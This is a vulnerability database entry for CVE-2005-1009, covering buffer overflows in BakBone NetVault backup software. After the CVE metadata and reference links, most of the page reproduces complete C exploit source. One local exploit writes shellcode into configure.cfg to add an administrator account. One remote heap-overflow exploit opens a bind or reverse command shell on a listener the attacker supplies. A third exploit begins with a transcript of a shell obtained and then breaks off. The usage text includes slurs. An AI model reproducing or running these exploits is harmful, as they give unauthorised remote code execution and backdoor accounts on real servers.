CVE-2005-1009
CVSS 10.0
Published: 2005-05-02 00:00:00
Last revised: 2008-09-05 16:47:56

[Original] Multiple buffer overflows in BakBone NetVault 6.x and 7.x allow (1) remote attackers to execute arbitrary code via a modified computer name and length that leads to a heap-based buffer overflow, or (2) local users to execute arbitrary code via a long Name entry in the configure.cfg file.


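[CNNVD] BakBone NetVault Remote Memory Corruption Vulnerability (CNNVD-200505-437)

        NetVault is a professional data backup and recovery system that supports Windows and Linux/Unix-like operating systems. NetVault has a memory-overwrite corruption vulnerability in its request handling; a remote attacker may exploit it to execute arbitrary commands on the server.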
        

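- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may render the system completely unavailable]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]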

- CPE (affected platforms and products)

cpe:/a:bakbone:netvault:7.0
cpe:/a:bakbone:netvault:7.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1009
(Official source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1009
(Official source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-437
(Official source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/19932
(UNKNOWN)  XF  netvault-configurecfg-bo(19932)
http://www.securityfocus.com/bid/12967
(UNKNOWN)  BID  12967
http://www.securityfocus.com/archive/1/394801
(VENDOR_ADVISORY)  BUGTRAQ  20050401 [Hat-Squad Advisory] Bakbone NetVault Heap overflow Vulnerabilities
http://www.hat-squad.com/en/000165.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000165.html
http://www.hat-squad.com/en/000164.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000164.html
http://www.class101.org/netv-remhbof.pdf
(VENDOR_ADVISORY)  MISC  http://www.class101.org/netv-remhbof.pdf
http://www.class101.org/netv-locsbof.pdf
(VENDOR_ADVISORY)  MISC  http://www.class101.org/netv-locsbof.pdf
http://securitytracker.com/id?1013625
(UNKNOWN)  SECTRACK  1013625
http://secunia.com/advisories/14814
(VENDOR_ADVISORY)  SECUNIA  14814

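- Vulnerability information

BakBone NetVault Remote Memory Corruption Vulnerability
Critical  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
        NetVault is a professional data backup and recovery system that supports Windows and Linux/Unix-like operating systems. NetVault has a memory-overwrite corruption vulnerability in its request handling; a remote attacker may exploit it to execute arbitrary commands on the server.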
        

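- Advisories and patches

        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: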
        http://www.bakbone.com/

- Vulnerability information (905)

BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit (EDBID:905)
windows local
2005-04-01 Verified
0 class101
N/A [Download]
/*
for more information: class101.org/netv-locsbof.pdf
*/

#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
/*add u:class101 p:class101 (*Administrators *users)*/
"\x33\xC9\x83\xE9\xC7\xE8\xFF\xFF\xFF\xFF\xC0\x5E\x81\x76\x0E\x15"
"\x90\x39\xE8\x83\xEE\xFC\xE2\xF4\xE9\x78\x7F\xE8\x15\x90\xB2\xAD"
"\x29\x1B\x45\xED\x6D\x91\xD6\x63\x5A\x88\xB2\xB7\x35\x91\xD2\x0B"
"\x3B\xD9\xB2\xDC\x9E\x91\xD7\xD9\xD5\x09\x95\x6C\xD5\xE4\x3E\x29"
"\xDF\x9D\x38\x2A\xFE\x64\x02\xBC\x31\x94\x4C\x0B\x9E\xCF\x1D\xE9"
"\xFE\xF6\xB2\xE4\x5E\x1B\x66\xF4\x14\x7B\xB2\xF4\x9E\x91\xD2\x61"
"\x49\xB4\x3D\x2B\x24\x50\x5D\x63\x55\xA0\xBC\x28\x6D\x9F\xB2\xA8"
"\x19\x1B\x49\xF4\xB8\x1B\x51\xE0\xFC\x9B\x39\xE8\x15\x1B\x79\xDC"
"\x10\xEC\x39\xE8\x15\x1B\x51\xD4\x4A\xA1\xCF\x88\x43\x7B\x34\x80"
"\xFA\x5E\xD9\x88\x7D\x08\xC7\x62\x1B\xC7\xC6\x0F\xFD\x7E\xC6\x17"
"\xEA\xF3\x54\x8C\x3B\xF5\x41\x8D\x35\xBF\x5A\xC8\x7B\xF5\x4D\xC8"
"\x60\xE3\x5C\x9A\x35\xF3\x55\x89\x66\xE3\x08\xD8\x24\xB0\x5A\x84"
"\x74\xE3\x4A\xD9\x25\xA1\x19\xC7\x54\xD4\x7D\xC8\x33\xB6\x19\x86"
"\x70\xE4\x19\x84\x7A\xF3\x58\x84\x72\xE2\x56\x9D\x65\xB0\x78\x8C"
"\x78\xF9\x57\x81\x66\xE4\x4B\x89\x61\xFF\x4B\x9B\x35\xF3\x55\x89"
"\x66\xE3\x08\xD8\x24\xB0\x16\xA9\x51\xD4\x39\xE8";


static char payload[8000];
FILE *fl, *fl2;
char *fp, line[1024];

int check(int argc,char *argv[]),i=0,j=0;
int check2();
void ver();
void usage(char* us);

char EOL[]="\x0D\x0A";
char esp[]="\xDD\x20\x02\x10";
char vul[]="\x4E\x61\x6D\x65\x3D";
char fun[]="\x3C\x63\x30\x64\x33\x72\x3E\x20\x27\x6C\x6F\x20\x49\x27\x6D\x20"
"\x67\x61\x79\x20\x49\x27\x6D\x20\x66\x72\x6F\x6D\x20\x49\x48\x53";


int main(int argc,char *argv[])
{
ver();
if (argc>5||argc<2||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (check(argc,argv)==-1){return -1;}
while (!feof(fl))
{
fgets(line, sizeof(line),fl);
if (strstr(line,vul)){
i++;j++;}
if (i==2){
strcpy(line,vul);
memset(line+5,0x90,600);
memcpy(line+252,esp,4);
memcpy(line+16,fun,32);
memcpy(line+260,scode1,strlen(scode1));
memcpy(line+605,EOL,2);i=0;j++;
}
strcat(payload,line);
}
if (strstr(payload,vul)==NULL||j==1){
printf("[+] \"%s\" isn't a default NetVault file..\n",fp);return -1;}
if (check2()==1){
fprintf(fl,"%s",payload);
printf("[+] \"%s\" correctly exploited\n",fp);
printf("[+] a service restart is needed to execute the payload\n");
}
else printf("[+] can't write to \"%s\", something is wrong...\n",fp);
return 0;

}

int check(int argc,char *argv[])
{
if (argc>2){fp=argv[2];}
else fp="configure.cfg";
if ((fl =fopen(fp,"r+"))==NULL){
printf("[+] \"%s\" not found or no rights to read/write\n",fp);return -1;}
return 1;
}

int check2()
{
if ((fl =fopen(fp,"r+"))==NULL)
return -1;
else return 1;
}

void usage(char* us)
{
printf("[+] . 101_netv.exe Target (adduser mode) \n");
printf("[+] . 101_netv.exe Target YourFile.cfg (adduser mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 1. WinXP SP0 Pro. English - v5.1.2600 \n");
printf("[+] 1. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 1. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("[+] 1. WinXP SP2 Pro. English (*) - v5.1.2600.2180 \n");
printf("[+] 1. Win2k3 SP0 Server English (*) - v5.2.3790 \n");
printf("NOTE: \n");
printf("The exploit mods the netvault's cfg file to add a win32 \n");
printf("user:class101 pass:class101 after a restart of the netvault service. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf("Compilation msvc6, cygwin, Linux. \n");
return;
}

void ver()
{
printf(" \n");
printf("==================================[v0.1]====\n");
printf("=====BakBone NetVault, Backup Server===============\n");
printf("=====Computername, Local Buffer Overflow Exploit=========\n");
printf("======coded by class101=======[Hat-Squad.com 2005]=====\n");
printf("============================================\n");
printf(" \n");
}

// milw0rm.com [2005-04-01]
		

- Vulnerability information (906)

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2) (EDBID:906)
windows remote
2005-04-01 Verified
20031 class101
N/A [Download]
/*
for more information: class101.org/netv-remhbof.pdf
*/

#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";


char scodeA[] =
"\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";

char scodeB[] =
"\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
"\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";

char scodeC[] =
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"
"\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
"\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"
"\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
"\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
"\x02\x00\x00\x00";

char scodeD[] =
"\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
"\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
"\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
"\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
"\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
"\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
"\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
"\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"
"\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
"\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";

char grabcpname[] =
"\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x00\x00\x00\x00\x00\x00\x00";

char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],cpname[1024],sz[1024],szb[1024],szb2[1024];
int tot,tot2,l00p=0;

char sip[3],spo[1],pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
char padA[]="\x00\x00\x00";
char szc[]="\xFF\xFF";

// rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77],77F82060
//for litchfield this method is reliable due to the fixed address 0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because you realiably repair the functions across all nt based os?, and where to realiably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and your shellcode will be executed
//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);
void sl(int time);

int main(int argc,char *argv[])
{
ver();
int check1, check2, rc, i, j, k;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
loop:
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro English\n";}
if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. English\n[+] WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
if (l00p==0){printf("[+] TARGET: %s\n",os);sl(1);}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
if (l00p==0)
{
printf("[+] connection 1: grabbing computername via netvault...\n");
sl(2);
send(s,grabcpname,sizeof(grabcpname)-1,0);
rc = recv(s,recvbuf,sizeof(recvbuf),0);
if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or patched, aborting..\n");return -1;}
else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..\n");return -1;}
else printf("[+] analyzing packets, sorting computername\n");
sl(2);
printf("[+] bufsize: %d\n",rc);sl(1);
for (i=80,j=0;recvbuf[i]!=0;i++,j++)
{
memset(cpname+j,recvbuf[i],1);
}
memset(sz,strlen(cpname)+1,1);
memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
memset(ver2+4,recvbuf[rc-34],1);
printf("[+] cmpname: %s\n",cpname);sl(1);
printf("[+] version: %s\n",ver2);sl(1);l00p++;
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
goto loop;
}
printf("[+]\n[+] connection 2: modding payload regarding computername and length\n");sl(1);
printf("[+] loading attack\n");sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
k=7-strlen(cpname);
memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417); rtl
// rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
// rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+k+31914,scode2,strlen(scode2));
}
else memcpy(payload2+k+31914,scode1,strlen(scode1));
tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
tot2=tot-192;
memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
memcpy(scodeC+254,szc,2);
printf("[+] sh0uting the heap!\n");sl(3);
if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
sl(6);
printf("[+]\n[+] size of payload: %d\n",tot);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}


void usage(char* us)
{

printf(" \n");
printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");
printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("NOTE: \n");
printf("The exploit bind a cmdshell port 101 or \n");
printf("reverse a cmdshell on your listener. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}

void ver()
{
printf(" \n");
printf("============================[v0.1]====\n");
printf("=====BakBone NetVault, Backup Server===============\n");
printf("=====Clientname, Remote Heap Overflow Exploit==========\n");
printf("====coded by class101======[Hat-Squad.com 2005]=====\n");
printf("============================================\n");
printf(" \n");
}

void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}

// milw0rm.com [2005-04-01]
		

- Vulnerability information (990)

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow (EDBID:990)
windows remote
2005-05-17 Verified
20031 nolimit
N/A [Download]
/* Bakbone Netvault heap overflow exploit. 
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.

As class101 has already shown, this application has a lot of holes. 
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd receive
the same response class did, which was none. So perhaps a second critical vulnerability
will wake Bakbone up to their software faults. 

A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
 so it's just as vulnerable as this. Not to mention the fact that not many businesses
 use this software anyway.
 ..Maybe it's because of all the holes??

Thx to Flare, AceHigh, Shift,class101, and of course BuzzDee.
Sorry.. everyone wants to be famous :)


 C:\CODING\c++\netvault\Release>netvault 1 2KVM
[*] Target:     2KVM    Port: 20031

Targetting 2K..
[*] Socket initialized...
[*] Sending  buffer.
[*] Sleeping..............
[*] Connecting again to trigger overflow..
[*] Connecting to host: 2KVM on port 101
[*] Exploit worked! dropping into shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\BakBone Software\NetVault>
-nolimit@COREiSO
*/
#include <stdio.h>
#include <string.h>
#include <io.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

void cmdshell (int sock);
long gimmeip(char *hostname);
char buffer[40000];
//initial request to host
char packet[]=
